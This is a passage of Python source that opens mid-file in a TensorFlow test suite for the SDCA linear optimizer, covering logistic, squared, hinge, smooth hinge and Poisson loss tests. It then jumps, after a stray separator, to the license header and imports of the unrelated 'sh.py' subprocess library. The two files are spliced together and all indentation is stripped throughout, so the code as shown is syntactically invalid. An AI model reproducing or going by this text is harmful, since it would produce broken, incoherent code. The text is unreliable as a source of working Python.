example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
examples = make_example_dict(example_protos, example_weights)
example_ids = array_ops.placeholder(
dtypes.string, shape=(len(example_weights),))
examples['example_ids'] = example_ids
variables = make_variable_dict(1, 1)
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
for num_shards in _SHARD_NUMBERS:
for num_loss_partitions in _NUM_LOSS_PARTITIONS:
with self._single_threaded_test_session():
options = dict(
# Keep the same solution as for TestSimple: since the number of
# examples is multplied by num_loss_partitions, multiply also
# L2 by the same value.
symmetric_l2_regularization=num_loss_partitions,
symmetric_l1_regularization=0,
loss_type='logistic_loss',
num_table_shards=num_shards,
num_loss_partitions=num_loss_partitions)
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
def minimize(worker_id):
with context.graph_mode(), self._single_threaded_test_session():
feed_dict = {example_ids: [
str(i + worker_id*len(example_weights)) for i in range(
len(example_weights))]}
for _ in range(_MAX_ITERATIONS):
train_op.run(feed_dict=feed_dict) # pylint: disable=cell-var-from-loop
threads = []
for worker_id in range(num_loss_partitions):
threads.append(threading.Thread(target=minimize, args=(worker_id,)))
threads[-1].start()
for t in threads:
t.join()
lr.update_weights(train_op).run(feed_dict={
example_ids: [str(i) for i in range(len(example_weights))]})
# Test only the unregularized loss because the optimal value of the
# regularized loss depends on num_loss_partitions.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.02)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertNear(0.0, lr.approximate_duality_gap().eval(), 0.02)
def testSimpleNoL2(self):
# L2 regularization of SDCA should be positive.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, 1)
options = dict(
symmetric_l2_regularization=0,
symmetric_l1_regularization=0,
num_table_shards=1,
loss_type='logistic_loss')
with self.assertRaises(ValueError):
_SDCAModel(examples, variables, options)
def testSomeUnweightedExamples(self):
# Setup test data with 4 examples, but should produce the same
# results as testSimple.
example_protos = [
# Will be used.
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
# Will be ignored.
make_example_proto({
'age': [1],
'gender': [0]
}, 0),
# Will be used.
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
# Will be ignored.
make_example_proto({
'age': [1],
'gender': [0]
}, 1),
]
example_weights = [1.0, 0.0, 1.0, 0.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
# Only use examples 0 and 2
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllClose([0, 1, 1, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testFractionalExampleLabel(self):
# Setup test data with 1 positive, and 1 mostly-negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0.1),
make_example_proto({
'age': [1],
'gender': [1]
}, 0.9),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
with self.assertRaisesOpError(
'Only labels of 0.0 or 1.0 are supported right now.'):
lr.minimize().run()
def testImbalanced(self):
# Setup test data with 1 positive, and 3 negative examples.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [2],
'gender': [0]
}, 0),
make_example_proto({
'age': [3],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0, 1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(3, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(
0.226487 + 0.102902, unregularized_loss.eval(), atol=0.08)
self.assertAllClose(0.328394 + 0.131364, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 0, 0, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=2e-2, atol=1e-2)
def testImbalancedWithExampleWeights(self):
# Setup test data with 1 positive, and 1 negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [3.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.284860, unregularized_loss.eval(), atol=0.08)
self.assertAllClose(0.408044, loss.eval(), atol=0.012)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=2e-2, atol=1e-2)
def testInstancesOfOneClassOnly(self):
# Setup test data with 1 positive (ignored), and 1 negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [0]
}, 1), # Shares gender with the instance above.
]
example_weights = [1.0, 0.0] # Second example "omitted" from training.
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 0], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testOutOfRangeSparseFeatures(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(0, 0)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
'indices.*'):
train_op.run()
def testOutOfRangeDenseFeatures(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.0], [0.0, 1.0]]],
weights=[20.0, 10.0],
labels=[1.0, 0.0])
# Replace with a variable of size 1 instead of 2.
variables['dense_features_weights'] = [
variables_lib.VariableV1(array_ops.zeros(
[1], dtype=dtypes.float32))
]
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
'More dense features than we have parameters for.*'):
train_op.run()
def testMissingFeature(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
make_example_proto({
'age': [],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=1,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
# TODO(katsiaspis): add a test for the case when examples at the end of an
# epoch are repeated, since example id may be duplicated.
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithLinearLossTest(_SDCAModelTest):
"""SDCA optimizer test class for linear (squared) loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be 2/3 of label due to minimizing regularized loss:
# (label - 2 * weight)^2 / 2 + L2 * 2 * weight^2
self.assertAllClose(
[-20.0 / 3.0, 28.0 / 3.0], predictions.eval(), rtol=0.005)
# Approximate gap should be very close to 0.0. (In fact, because the gap
# is only approximate, it is likely that upon convergence the duality gap
# can have a tiny negative value).
self.assertAllClose(0.0, lr.approximate_duality_gap().eval(), atol=1e-2)
def testL2Regularization(self):
# Setup test data
example_protos = [
# 2 identical examples
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
# 2 more identical examples
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0, 1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=16,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be 1/5 of label due to minimizing regularized loss:
# (label - 2 * weight)^2 + L2 * 16 * weight^2
optimal1 = -10.0 / 5.0
optimal2 = 14.0 / 5.0
self.assertAllClose(
[optimal1, optimal1, optimal2, optimal2],
predictions.eval(),
rtol=0.01)
def testL1Regularization(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=4.0,
loss_type='squared_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
prediction = lr.predictions(examples)
loss = lr.regularized_loss(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be -4, 20/3 due to minimizing regularized loss:
# (label - 2 * weight)^2 / 2 + L2 * 2 * weight^2 + L1 * 4 * weight
self.assertAllClose([-4.0, 20.0 / 3.0], prediction.eval(), rtol=0.08)
# Loss should be the sum of the regularized loss value from above per
# example after plugging in the optimal weights.
self.assertAllClose(308.0 / 6.0, loss.eval(), atol=0.01)
def testFeatureValues(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0, -2.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0, 2.0),
]
example_weights = [5.0, 3.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# There are 4 (sparse) variable weights to be learned. 2 for age and 2 for
# gender. Let w_1, w_2 be age weights, w_3, w_4 be gender weights, y_1,
# y_2 be the labels for examples 1 and 2 respectively and s_1, s_2 the
# corresponding *example* weights. With the given feature values, the loss
# function is given by:
# s_1/2(y_1 + 2w_1 + 2w_3)^2 + s_2/2(y_2 - 2w_2 - 2w_4)^2
# + \lambda/2 (w_1^2 + w_2^2 + w_3^2 + w_4^2). Solving for the optimal, it
# can be verified that:
# w_1* = w_3* = -2.0 s_1 y_1/(\lambda + 8 s_1) and
# w_2* = w_4* = 2 \cdot s_2 y_2/(\lambda + 8 s_2). Equivalently, due to
# regularization and example weights, the predictions are within:
# 8 \cdot s_i /(\lambda + 8 \cdot s_i) of the labels.
self.assertAllClose(
[-10 * 40.0 / 41.0, 14.0 * 24 / 25.0], predictions.eval(), atol=0.01)
def testDenseFeaturesWithDefaultWeights(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0], [0.0]], [0.0, 1.0]],
weights=[1.0, 1.0],
labels=[10.0, -5.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The loss function for these particular features is given by:
# 1/2(label_1-w_1)^2 + 1/2(label_2-w_2)^2 + \lambda/2 (w_1^2 + w_2^2). So,
# differentiating wrt to w_1, w_2 yields the following optimal values:
# w_1* = label_1/(\lambda + 1)= 10/2, w_2* =label_2/(\lambda + 1)= -5/2.
# In this case the (unnormalized regularized) loss will be:
# 1/2(10-5)^2 + 1/2(5-5/2)^2 + 1/2(5^2 + (5/2)^2) = 125.0/4. The actual
# loss should be further normalized by the sum of example weights.
self.assertAllClose([5.0, -2.5], predictions.eval(), rtol=0.01)
loss = lr.regularized_loss(examples)
self.assertAllClose(125.0 / 8.0, loss.eval(), atol=0.01)
def testDenseFeaturesWithArbitraryWeights(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.0], [0.0, 1.0]]],
weights=[20.0, 10.0],
labels=[10.0, -5.0])
options = dict(
symmetric_l2_regularization=5.0,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The loss function for these particular features is given by:
# 1/2 s_1 (label_1-w_1)^2 + 1/2 s_2(label_2-w_2)^2 +
# \lambda/2 (w_1^2 + w_2^2) where s_1, s_2 are the *example weights. It
# turns out that the optimal (variable) weights are given by:
# w_1* = label_1 \cdot s_1/(\lambda + s_1)= 8.0 and
# w_2* =label_2 \cdot s_2/(\lambda + s_2)= -10/3.
# In this case the (unnormalized regularized) loss will be:
# s_1/2(8-10)^2 + s_2/2(5-10/3)^2 + 5.0/2(8^2 + (10/3)^2) = 2175.0/9. The
# actual loss should be further normalized by the sum of example weights.
self.assertAllClose([8.0, -10.0 / 3], predictions.eval(), rtol=0.01)
loss = lr.regularized_loss(examples)
self.assertAllClose(2175.0 / 270.0, loss.eval(), atol=0.01)
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithHingeLossTest(_SDCAModelTest):
"""SDCA optimizer test class for hinge loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
# Before minimization, the weights default to zero. There is no loss due
# to regularization, only unregularized loss which is 0.5 * (1+1) = 1.0.
predictions = model.predictions(examples)
self.assertAllClose([0.0, 0.0], predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(1.0, unregularized_loss.eval())
self.assertAllClose(1.0, regularized_loss.eval())
# After minimization, the model separates perfectly the data points. There
# are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender (say w3
# and w4). Solving the system w1 + w3 = 1.0, w2 + w4 = -1.0 and minimizing
# wrt to \|\vec{w}\|_2, gives w1=w3=1/2 and w2=w4=-1/2. This gives 0.0
# unregularized loss and 0.25 L2 loss.
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
binary_predictions = get_binary_predictions_for_hinge(predictions)
self.assertAllEqual([-1.0, 1.0], predictions.eval())
self.assertAllEqual([0, 1], binary_predictions.eval())
self.assertAllClose(0.0, unregularized_loss.eval())
self.assertAllClose(0.25, regularized_loss.eval(), atol=0.05)
def testDenseFeaturesPerfectlySeparable(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[1.0, 1.0], [1.0, -1.0]],
weights=[1.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
self.assertAllClose([1.0, -1.0], predictions.eval(), atol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
# (1.0, 1.0) and (1.0, -1.0) are perfectly separable by x-axis (that is,
# the SVM's functional margin >=1), so the unregularized loss is ~0.0.
# There is only loss due to l2-regularization. For these datapoints, it
# turns out that w_1~=0.0 and w_2~=1.0 which means that l2 loss is ~0.25.
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.0, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.25, regularized_loss.eval(), atol=0.02)
def testDenseFeaturesSeparableWithinMargins(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.5], [1.0, -0.5]]],
weights=[1.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
# (1.0, 0.5) and (1.0, -0.5) are separable by x-axis but the datapoints
# are within the margins so there is unregularized loss (1/2 per example).
# For these datapoints, optimal weights are w_1~=0.0 and w_2~=1.0 which
# gives an L2 loss of ~0.25.
self.assertAllClose([0.5, -0.5], predictions.eval(), rtol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.5, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.75, regularized_loss.eval(), atol=0.02)
def testDenseFeaturesWeightedExamples(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0], [1.0]], [[0.5], [-0.5]]],
weights=[3.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
# Point (1.0, 0.5) has higher weight than (1.0, -0.5) so the model will
# try to increase the margin from (1.0, 0.5). Due to regularization,
# (1.0, -0.5) will be within the margin. For these points and example
# weights, the optimal weights are w_1~=0.4 and w_2~=1.2 which give an L2
# loss of 0.5 * 0.25 * 0.25 * 1.6 = 0.2. The binary predictions will be
# correct, but the boundary will be much closer to the 2nd point than the
# first one.
self.assertAllClose([1.0, -0.2], predictions.eval(), atol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.2, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.4, regularized_loss.eval(), atol=0.02)
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithSmoothHingeLossTest(_SDCAModelTest):
"""SDCA optimizer test class for smooth hinge loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='smooth_hinge_loss')
model = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
# Before minimization, the weights default to zero. There is no loss due
# to regularization, only unregularized loss which is 0.5 * (1+1) = 1.0.
predictions = model.predictions(examples)
self.assertAllClose([0.0, 0.0], predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(1.0, unregularized_loss.eval())
self.assertAllClose(1.0, regularized_loss.eval())
# After minimization, the model separates perfectly the data points. There
# are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender (say w3
# and w4). The minimization leads to w1=w3=1/3 and w2=w4=-1/3. This gives
# an unregularized hinge loss of 0.33 and a 0.11 L2 loss
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
binary_predictions = get_binary_predictions_for_hinge(predictions)
self.assertAllClose([-0.67, 0.67], predictions.eval(), atol=0.05)
self.assertAllEqual([0, 1], binary_predictions.eval())
self.assertAllClose(0.33, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.44, regularized_loss.eval(), atol=0.02)
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithPoissonLossTest(_SDCAModelTest):
"""SDCA optimizer test class for poisson loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 2),
]
example_weights = [100.0, 100.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='poisson_loss')
model = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
# Before minimization, the weights default to zero. There is no loss due
# to regularization, only unregularized loss which is 1 for each example.
predictions = model.predictions(examples)
self.assertAllClose([1.0, 1.0], predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
approximate_duality_gap = model.approximate_duality_gap()
self.assertAllClose(1.0, unregularized_loss.eval())
self.assertAllClose(1.0, regularized_loss.eval())
# There are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender
# (say w3 and w4). The minimization leads to:
# w1=w3=-1.96487, argmin of 100*(exp(2*w)-2*w*0)+w**2.
# w2=w4=0.345708, argmin of 100*(exp(2*w)-2*w*2)+w**2.
# This gives an unregularized loss of .3167 and .3366 with regularization.
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
self.assertAllClose([0.0196, 1.9965], predictions.eval(), atol=1e-4)
self.assertAllClose(0.3167, unregularized_loss.eval(), atol=1e-4)
self.assertAllClose(0.3366, regularized_loss.eval(), atol=1e-4)
self.assertAllClose(0., approximate_duality_gap.eval(), atol=1e-6)
class SdcaFprintTest(_SDCAModelTest):
"""Tests for the SdcaFprint op.
This is one way of enforcing the platform-agnostic nature of SdcaFprint.
Basically we are checking against exact values and this test could be running
across different platforms. Note that it is fine for expected values to change
in the future, if the implementation of SdcaFprint changes (ie this is *not* a
frozen test).
"""
def testFprint(self):
with self._single_threaded_test_session():
in_data = constant_op.constant(['abc', 'very looooooong string', 'def'])
out_data = gen_sdca_ops.sdca_fprint(in_data)
self.assertAllEqual([[4143508125394299908, -6879828354153669051],
[5849691694103072671, -4874542629849009556],
[603227410218889250, 8762207001949257490]],
self.evaluate(out_data))
class _SparseFeatureColumnTest(TensorFlowTestCase):
"""Tests for _SparseFeatureColumn.
"""
def testBasic(self):
expected_example_indices = [1, 1, 1, 2]
expected_feature_indices = [0, 1, 2, 0]
sfc = _SparseFeatureColumn(expected_example_indices,
expected_feature_indices, None)
self.assertTrue(isinstance(sfc.example_indices, ops.Tensor))
self.assertTrue(isinstance(sfc.feature_indices, ops.Tensor))
self.assertEqual(sfc.feature_values, None)
with self.cached_session():
self.assertAllEqual(
expected_example_indices,
self.evaluate(sfc.example_indices))
self.assertAllEqual(
expected_feature_indices,
self.evaluate(sfc.feature_indices))
expected_feature_values = [1.0, 2.0, 3.0, 4.0]
sfc = _SparseFeatureColumn([1, 1, 1, 2], [0, 1, 2, 0],
expected_feature_values)
with self.cached_session():
self.assertAllEqual(
expected_feature_values,
self.evaluate(sfc.feature_values))
if __name__ == '__main__':
googletest.main()
|
sh.py | """
http://amoffat.github.io/sh/
"""
# ===============================================================================
# Copyright (C) 2011-2020 by Andrew Moffat
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# ===============================================================================
__version__ = "1.14.1"
__project_url__ = "https://github.com/amoffat/sh"
from collections import deque
try:
from collections.abc import Mapping
except ImportError:
from collections import Mapping
from contextlib import contextmanager
from functools import partial
from io import UnsupportedOperation, open as fdopen
from locale import getpreferredencoding
from types import ModuleType, GeneratorType
import ast
import errno
import fcntl
import gc
import getpass
import glob as glob_module
import inspect
import logging
import os
import platform
import pty
import pwd
import re
import select
import signal
import stat
import struct
import sys
import termios
import threading
import time
import traceback
import tty
